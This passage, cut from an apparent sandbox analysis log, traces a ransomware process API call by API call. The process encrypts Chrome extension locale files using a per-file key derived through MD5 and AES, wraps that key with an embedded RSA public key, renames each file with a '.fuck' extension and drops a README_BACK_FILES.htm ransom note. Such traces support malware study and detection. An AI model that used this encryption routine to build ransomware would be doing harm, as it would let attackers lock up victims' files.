Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.697] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.697] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.698] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.698] GetLastError () returned 0x0 [0256.698] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json")) returned 0x20 [0256.698] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json", dwFileAttributes=0x80) returned 1 [0256.699] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.700] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.702] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.702] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e143a0) returned 1 [0256.705] CryptCreateHash (in: hProv=0x2e143a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.705] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.705] CryptHashData (hHash=0x2e18128, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.705] CryptDeriveKey (in: hProv=0x2e143a0, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e197e8) returned 1 [0256.705] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.705] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.705] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e13438) returned 1 [0256.706] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13438, dwCertEncodingType=0x1, pInfo=0x2e29950*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29980*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29988*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e196a8) returned 1 [0256.706] CryptEncrypt (in: hKey=0x2e196a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.706] CryptEncrypt (in: hKey=0x2e196a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14428*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e14428*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.707] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e14428*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e14428*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.708] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x103, lpOverlapped=0x0) returned 1 [0256.710] CryptEncrypt (in: hKey=0x2e197e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x103, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0256.710] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0256.710] CloseHandle (hObject=0x5d60) returned 1 [0256.710] CloseHandle (hObject=0x5d5c) returned 1 [0256.710] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json"), bFailIfExists=0) returned 1 [0256.717] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json", dwFileAttributes=0x0) returned 1 [0256.718] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.gsg")) returned 1 [0256.719] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\messages.json.fuck")) returned 1 [0256.720] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.720] CryptDestroyKey (hKey=0x2e197e8) returned 1 [0256.720] CryptReleaseContext (hProv=0x2e143a0, dwFlags=0x0) returned 1 [0256.720] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.721] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.721] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\readme_back_files.htm")) returned 0xffffffff [0256.721] AreFileApisANSI () returned 1 [0256.721] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.721] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\am\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.722] GetFileType (hFile=0x5d50) returned 0x1 [0256.722] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.730] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.730] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.730] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.730] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.730] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.730] GetLastError () returned 0x0 [0256.730] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json")) returned 0x20 [0256.731] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0256.732] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.732] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.733] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.734] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13878) returned 1 [0256.736] CryptCreateHash (in: hProv=0x2e13878, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.736] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.736] CryptHashData (hHash=0x2e18128, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.736] CryptDeriveKey (in: hProv=0x2e13878, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e191e8) returned 1 [0256.737] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.737] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0256.737] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e133b0) returned 1 [0256.737] CryptImportPublicKeyInfo (in: hCryptProv=0x2e133b0, dwCertEncodingType=0x1, pInfo=0x2e29a20*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29a50*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29a58*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e197e8) returned 1 [0256.737] CryptEncrypt (in: hKey=0x2e197e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0256.737] CryptEncrypt (in: hKey=0x2e197e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e143a0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e143a0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0256.737] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e143a0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e143a0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0256.739] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0xed, lpOverlapped=0x0) returned 1 [0256.740] CryptEncrypt (in: hKey=0x2e191e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xed, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0256.740] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0256.740] CloseHandle (hObject=0x5d5c) returned 1 [0256.740] CloseHandle (hObject=0x5d60) returned 1 [0256.741] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0256.745] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0256.746] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.gsg")) returned 1 [0256.747] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\messages.json.fuck")) returned 1 [0256.752] CryptDestroyHash (hHash=0x2e18128) returned 1 [0256.752] CryptDestroyKey (hKey=0x2e191e8) returned 1 [0256.752] CryptReleaseContext (hProv=0x2e13878, dwFlags=0x0) returned 1 [0256.752] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0256.752] FindClose (in: hFindFile=0x2e180e8 | out: hFindFile=0x2e180e8) returned 1 [0256.752] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0256.753] AreFileApisANSI () returned 1 [0256.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0256.753] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.754] GetFileType (hFile=0x5d50) returned 0x1 [0256.754] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0256.756] FindNextFileA (in: hFindFile=0x2e186a8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0256.756] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180e8 [0256.757] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.757] FindNextFileA (in: hFindFile=0x2e180e8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0256.757] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0256.757] GetLastError () returned 0x0 [0256.757] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json")) returned 0x20 [0256.757] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json", dwFileAttributes=0x80) returned 1 [0256.758] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0256.758] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0256.760] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\az\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0256.760] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e13878) returned 1 [0256.763] CryptCreateHash (in: hProv=0x2e13878, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0256.763] lstrlenA (lpString="byYgIfljhIqZCcAZfOYyRTjjzMlQm") returned 29 [0256.763] CryptHashData (hHash=0x2e18128, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.763] CryptDeriveKey (in: hProv=0x2e13878, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e191e8) returned 1 [0256.763] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 